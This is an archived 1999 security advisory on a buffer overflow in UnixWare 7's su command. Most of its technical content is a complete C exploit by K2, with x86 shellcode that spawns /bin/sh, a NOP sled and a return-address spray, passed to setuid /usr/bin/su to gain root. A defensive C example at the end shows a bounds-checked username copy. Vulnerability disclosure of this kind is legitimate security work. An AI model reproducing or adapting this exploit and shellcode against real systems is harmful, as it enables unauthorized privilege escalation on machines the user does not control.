
unixware.su.txt

26 Nov 1999 00:00:00 | Reported by Shane A. Macaulay | Type: packetstorm | Source: packetstormsecurity.com

The su command in UnixWare 7 performs improper bounds checking on the username argument, which leads to a buffer overflow.

Code
`-----Original Message-----  
Date: Fri, 26 Nov 1999 04:16:41 +0300 (MSK)  
From: Matt Conover <[email protected]>  
To: [email protected]  
cc: [email protected]  
Subject: [w00giving '99 #5 and w00news]: UnixWare 7's su  
Message-ID:  
<[email protected]>  
MIME-Version: 1.0  
Content-Type: TEXT/PLAIN; charset=US-ASCII  
  
w00w00 Security Development (WSD)  
http://www.w00w00.org/advisories.html  
  
----------------------------------------------------------------------------  
Sorry, we've been really tied up these past 2-3 weeks and have been unable  
to write up the advisories. We'll send three SCO advisories tonight to  
make up for it. We should have some interesting ones within the next two  
weeks (it's really hard to find the time to write up the exploits and  
advisories).  
  
You'll notice we jumped from #3 to #5. w00giving advisory #4 has been  
available on http://www.w00w00.org/advisories.html for 2-3 weeks, but  
it wasn't posted to this list. w00w00.org has had hits from 55 different  
countries as of yesterday.  
  
If you are going to send out advisories, please cc them to  
[email protected], also. You can subscribe to it by sending  
"subscribe news" to [email protected]. Technotronic is a good  
site and beginning now, you will always see our advisories/articles/code  
posted on there first (order of release: w00w00.org,  
[email protected], news groups, bugtraq).  
----------------------------------------------------------------------------  
  
Discovered by: K2 ([email protected])  
  
The su command on SCO's UnixWare 7 has improper bounds checking on the  
username passed (via argv[1]), which can cause a buffer overflow when  
a lengthy username is passed.  
  
----------------------------------------------------------------------------  
Exploit (by K2):  
  
// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
char shell[] =  
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"  
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"  
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"  
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"  
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"  
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";  
  
const char x86_nop=0x90;  
long nop,esp;  
long offset=DEFOFF;  
char buffer[SIZE];  
  
long get_esp() { __asm__("movl %esp,%eax"); }  
  
int main (int argc, char *argv[])  
{  
register int i;  
  
if (argc > 1) offset += strtol(argv[1], NULL, 0);  
if (argc > 2) nop += strtoul(argv[2], NULL, 0);  
else  
nop = NOPDEF;  
esp = get_esp();  
  
memset(buffer, x86_nop, SIZE);  
memcpy(buffer+nop, shell, strlen(shell));  
  
for (i = nop+strlen(shell); i < SIZE-4; i += 4)  
*((int *) &buffer[i]) = esp+offset;  
  
printf("offset = [0x%x]\n",esp+offset);  
execl("/usr/bin/su", "su", buffer, NULL);  
  
printf("exec failed!\n");  
return 0;  
}  
  
----------------------------------------------------------------------------  
Patch:  
  
SCO is in the process of fixing a list of vulnerabilities we sent a few  
weeks ago.  
  
----------------------------------------------------------------------------  
  
  
`
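
The bug class the advisory describes (argv[1] copied without a length check) beside a bounds-checked version, as an added C example. It is not SCO's su source and not part of the original advisory; `USERNAME_MAX`, `copy_username`, `copy_username_unchecked` and the allowed character set are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define USERNAME_MAX 32 /* assumed buffer size, terminator included */

enum name_status { NAME_OK, NAME_EMPTY, NAME_TOO_LONG, NAME_BAD_CHAR };

/* Bug class from the advisory: argv[1] copied with no length check.
 * Shown for contrast only; never call it on untrusted input. */
void copy_username_unchecked(char *dst, const char *src) { strcpy(dst, src); }

/* Hardened copy: rejects (never truncates) names that do not fit, since a
 * truncated name could silently select a different account. */
enum name_status copy_username(char *dst, size_t dstlen, const char *src)
{
    size_t i, n = 0;

    if (dst == NULL || dstlen == 0 || src == NULL)
        return NAME_EMPTY;
    dst[0] = '\0';                       /* defined output on every error path */
    while (n < dstlen && src[n] != '\0') /* scan at most dstlen bytes */
        n++;
    if (n == 0)
        return NAME_EMPTY;
    if (n >= dstlen)                     /* no room for the terminator */
        return NAME_TOO_LONG;
    for (i = 0; i < n; i++) {            /* assumed allow-list for login names */
        unsigned char c = (unsigned char)src[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return NAME_BAD_CHAR;
    }
    memcpy(dst, src, n + 1);             /* n + 1 <= dstlen is proven above */
    return NAME_OK;
}

int main(int argc, char *argv[])
{
    char user[USERNAME_MAX];
    const char *arg = (argc > 1) ? argv[1] : "root"; /* constructed default */
    enum name_status st = copy_username(user, sizeof user, arg);

    if (st != NAME_OK) {
        fprintf(stderr, "invalid user name (status %d)\n", (int)st);
        return 1;
    }
    printf("target user: %s\n", user);
    return 0;
}
```

For a setuid program, the length and character checks belong before any other use of the argument, and a rejected name should end the run rather than fall back to a default account.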
